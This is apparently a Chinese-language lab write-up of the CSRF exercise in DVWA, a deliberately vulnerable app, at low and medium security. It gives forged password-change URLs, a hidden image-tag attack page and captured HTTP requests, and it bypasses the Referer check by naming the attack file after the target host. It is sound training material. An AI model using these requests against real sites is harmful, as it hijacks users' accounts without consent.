CSRF
0x01 low
跨站,输入密码和确认密码直接写在url中,将连接分享给目标,点击后修改密码
社工方式让目标点击短链接
伪造404页,在图片中写路径为payload,目标载入网页自动请求构造链接,目标被攻击
http://dvt.dv/learndvwa/vulnerabilities/csrf/?password_new=123&password_conf=123&Change=Change#
观察到url中的修改信息
目标的网站应当处于登录状态才可攻击成功
恶意网页如下,尝试攻击
目标访问,抓包观察
GET /att/tforc.html HTTP/1.1 Host: dvt.dv Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7 Cookie: security=medium; PHPSESSID=3ejpptkt8se4a8r4o5vftooj32 Connection: close
第一个包,访问页面
GET /learndvwa/vulnerabilities/csrf/?password_new=bbb&password_conf=bbb&Change=Change HTTP/1.1 Host: dvt.dv User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8 Referer: http://dvt.dv/att/tforc.html Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7 Cookie: security=medium; PHPSESSID=3ejpptkt8se4a8r4o5vftooj32 Connection: close
第二个包,请求img标签中的src值
目标的密码被修改,利用成功
0x02 medium
stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false
增加过滤,检测请求头中的reffer,请求头中的host由$_SERVER[‘SERVER_NAME’]获取。referer中出现host,检测为来源自本host,才能使用修改密码功能
在referer中出现host的值能通过。虑构造.html文件的文件名为利用网站的host,这样能绕过检测。或将.html放在服务器中包含目标host值的目录中
Low级别的图片演示不妥,我直接在网站下建个文件夹放恶意.html文件,真实情况下这种条件不可能发生
演示命名文件名
GET /noSpecialFilderName/dvt.dv.html HTTP/1.1 Host: attack.at Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7 If-None-Match: "11a-615565ab38c9e" If-Modified-Since: Fri, 05 Apr 2024 09:48:13 GMT Connection: close
GET /learndvwa/vulnerabilities/csrf/?password_new=file&password_conf=file&Change=Change HTTP/1.1 Host: dvt.dv User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8 Referer: http://attack.at/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7 Connection: close
呵呵,谷歌给referer作截断
手动修改
GET /learndvwa/vulnerabilities/csrf/?password_new=file&password_conf=file&Change=Change HTTP/1.1 Host: dvt.dv User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8 Referer: http://attack.at/noSpecialFilderName/dvt.dv.html Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7 Connection: close
GET /learndvwa/login.php HTTP/1.1 Host: dvt.dv User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8 Referer: http://attack.at/noSpecialFilderName/dvt.dv.html Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7 Connection: close
后面的包也改一下
不太成,不知道为啥XD,现代浏览器都不这么干了捏
尝试恶意host
GET /learndvwa/vulnerabilities/csrf/?password_new=att&password_conf=att&Change=Change HTTP/1.1 Host: dvt.dv User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8 Referer: http://hstnmdvt.dv/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7 Connection: close
这个包能改成
这个也能成
